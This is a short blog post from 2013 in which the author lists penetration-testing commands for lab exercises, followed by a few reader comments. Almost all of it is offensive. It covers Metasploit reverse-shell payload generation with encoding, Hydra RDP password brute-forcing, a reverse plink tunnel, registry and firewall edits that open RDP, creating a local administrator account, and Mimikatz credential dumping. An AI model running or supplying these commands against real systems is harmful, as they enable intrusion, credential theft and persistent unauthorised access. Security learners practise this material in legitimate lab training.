Thursday, 12 December 2013

Penetration Testing Necessary Links and Handy Commands

I personally require quick access to few commands, and some links while working on Penetration Testing exercises, so decided to post below information on this blog :)

General Links 

Privilege Escalation Links:
Handy Commands:

Scans all ports with 10000 Pakctes rate:

unicornscan X.X.X.X:a -r10000 -v


python -c 'import pty;pty.spawn("/bin/bash")'
python -m SimpleHTTPServer   (Starting HTTP Server)


hydra  -l admin -P /root/Desktop/passwords -S X.X.X.X rdp   (Self Explanatory)

Mount Remote Windows Share:

smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw

Metasploit Payloads:

msfpayload windows/meterpreter/reverse_tcp LHOST= X > system.exe
msfpayload php/meterpreter/reverse_tcp LHOST= LPORT=443 R > exploit.php
msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=443 R | msfencode -t asp -o file.asp
msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R |  msfencode -e x86/shikata_ga_nai -b "\x00" -t c

Plink Tunnel:

plink.exe -P 22 -l root -pw "1234" -R 445: X.X.X.X

Enable RDP Access:

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable 
netsh firewall set service remotedesktop enable

Nmap WebDAV Scanning:

nmap -p80,8080 --script=http-iis-webdav-vuln


run getgui -u admin -p 1234
run vnc -p 5043

Add User Windows:

net user test 1234 /add
net localgroup administrators test /add


sekurlsa::logonPasswords full

Compiling Windows Exploits on Backtrack:

cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe

Nasm Command:

nasm -f bin -o payload.bin payload.asm

To Be Continued....

Hope its helpful to all of you!


  1. My last night in the lab tonight!!! Great post!!! Wish you had post this long time ago!! hehe

  2. hehe..thanx buddy..i will share more info soon..!

  3. Thanks for sharing. Learn a lot from your Blog.I have read your blog about Penetration Testing It is very help full.I really enjoyed reading it, you may be a great author.I must say you've done a wonderful job by sharing your article with us. External penetration testing